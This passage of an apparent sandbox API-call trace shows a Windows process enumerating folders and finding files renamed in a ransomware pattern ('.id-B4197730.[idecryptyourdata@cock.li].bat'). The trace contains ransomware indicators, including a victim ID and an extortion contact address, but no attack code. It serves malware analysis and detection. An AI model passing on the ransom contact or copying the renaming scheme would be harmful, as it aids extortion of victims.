ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="1038", cAlternateFileName="")) returned 1 [0155.768] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44e0058 [0155.769] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1038\\*", lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName=".", cAlternateFileName="")) returned 0x7280c8 [0155.769] FindNextFileW (in: hFindFile=0x7280c8, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="..", cAlternateFileName="")) returned 1 [0155.770] FindNextFileW (in: hFindFile=0x7280c8, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd5d863b, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd5d863b, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd670f91, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x1184, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="EULART~1.BAT")) returned 1 [0155.770] FindNextFileW (in: hFindFile=0x7280c8, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd670f91, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd670f91, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd6982b5, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x152a6, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="LOCALI~1.BAT")) returned 1 [0155.770] FindNextFileW (in: hFindFile=0x7280c8, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd40eb60, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd40eb60, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd40eb60, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4a58, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 1 [0155.770] FindNextFileW (in: hFindFile=0x7280c8, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd40eb60, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd40eb60, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd40eb60, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4a58, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 0 [0155.770] FindClose (in: hFindFile=0x7280c8 | out: hFindFile=0x7280c8) returned 1 [0155.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44e0058 | out: hHeap=0x6a0000) returned 1 [0155.771] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="1040", cAlternateFileName="")) returned 1 [0155.771] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44e0058 [0155.771] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1040\\*", lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName=".", cAlternateFileName="")) returned 0x727ec8 [0155.772] FindNextFileW (in: hFindFile=0x727ec8, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="..", cAlternateFileName="")) returned 1 [0155.772] FindNextFileW (in: hFindFile=0x727ec8, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd6bd59c, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd6bd59c, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd7a2240, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0xf24, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="EULART~1.BAT")) returned 1 [0155.772] FindNextFileW (in: hFindFile=0x727ec8, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd6bd59c, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd6bd59c, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd6bd59c, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x139b6, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="LOCALI~1.BAT")) returned 1 [0155.772] FindNextFileW (in: hFindFile=0x727ec8, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd6e378c, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd6e378c, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd6e378c, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 1 [0155.772] FindNextFileW (in: hFindFile=0x727ec8, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd6e378c, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd6e378c, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd6e378c, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 0 [0155.772] FindClose (in: hFindFile=0x727ec8 | out: hFindFile=0x727ec8) returned 1 [0155.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44e0058 | out: hHeap=0x6a0000) returned 1 [0155.773] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="1041", cAlternateFileName="")) returned 1 [0155.773] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44e0058 [0155.773] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1041\\*", lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName=".", cAlternateFileName="")) returned 0x727708 [0155.774] FindNextFileW (in: hFindFile=0x727708, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="..", cAlternateFileName="")) returned 1 [0155.774] FindNextFileW (in: hFindFile=0x727708, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd6e378c, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd6e378c, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd83ad9c, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x2874, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="EULART~1.BAT")) returned 1 [0155.774] FindNextFileW (in: hFindFile=0x727708, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd7a2240, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd7a2240, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd8149fa, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x10b86, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="LOCALI~1.BAT")) returned 1 [0155.775] FindNextFileW (in: hFindFile=0x727708, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd434d45, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd434d45, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd45af2a, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x3e58, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 1 [0155.775] FindNextFileW (in: hFindFile=0x727708, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd434d45, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd434d45, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd45af2a, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x3e58, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 0 [0155.775] FindClose (in: hFindFile=0x727708 | out: hFindFile=0x727708) returned 1 [0155.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44e0058 | out: hHeap=0x6a0000) returned 1 [0155.776] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="1042", cAlternateFileName="")) returned 1 [0155.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44f0060 [0156.233] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1042\\*", lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName=".", cAlternateFileName="")) returned 0x728008 [0156.234] FindNextFileW (in: hFindFile=0x728008, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="..", cAlternateFileName="")) returned 1 [0156.234] FindNextFileW (in: hFindFile=0x728008, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd83ad9c, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd83ad9c, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd8d361e, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x3274, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="EULART~1.BAT")) returned 1 [0156.235] FindNextFileW (in: hFindFile=0x728008, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd83ad9c, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd83ad9c, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd860e43, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0xffd6, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="LOCALI~1.BAT")) returned 1 [0156.235] FindNextFileW (in: hFindFile=0x728008, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd45af2a, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd45af2a, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd481149, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x3c58, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 1 [0156.235] FindNextFileW (in: hFindFile=0x728008, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd45af2a, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd45af2a, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd481149, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x3c58, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 0 [0156.235] FindClose (in: hFindFile=0x728008 | out: hFindFile=0x728008) returned 1 [0156.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0156.236] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="1043", cAlternateFileName="")) returned 1 [0156.236] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44f0060 [0156.236] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1043\\*", lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName=".", cAlternateFileName="")) returned 0x728008 [0156.237] FindNextFileW (in: hFindFile=0x728008, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="..", cAlternateFileName="")) returned 1 [0156.237] FindNextFileW (in: hFindFile=0x728008, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd860e43, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd860e43, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd8ad2b7, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0xec4, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="EULART~1.BAT")) returned 1 [0156.237] FindNextFileW (in: hFindFile=0x728008, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd8ad2b7, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd8ad2b7, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdd9813b, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x13816, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="LOCALI~1.BAT")) returned 1 [0156.237] FindNextFileW (in: hFindFile=0x728008, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd8870a3, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd8870a3, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd8ad2b7, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4c58, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 1 [0156.238] FindNextFileW (in: hFindFile=0x728008, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd8870a3, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd8870a3, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd8ad2b7, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4c58, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 0 [0156.238] FindClose (in: hFindFile=0x728008 | out: hFindFile=0x728008) returned 1 [0156.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0156.238] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="1044", cAlternateFileName="")) returned 1 [0156.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44f0060 [0156.239] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1044\\*", lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName=".", cAlternateFileName="")) returned 0x728008 [0156.239] FindNextFileW (in: hFindFile=0x728008, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="..", cAlternateFileName="")) returned 1 [0156.239] FindNextFileW (in: hFindFile=0x728008, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd8d361e, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd8d361e, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd91f985, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0xcd4, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="EULART~1.BAT")) returned 1 [0156.239] FindNextFileW (in: hFindFile=0x728008, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd91f985, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd91f985, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd9b852d, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x136c6, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="LOCALI~1.BAT")) returned 1 [0156.239] FindNextFileW (in: hFindFile=0x728008, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd53fe4c, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd53fe4c, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd53fe4c, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4658, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 1 [0156.240] FindNextFileW (in: hFindFile=0x728008, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd53fe4c, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd53fe4c, 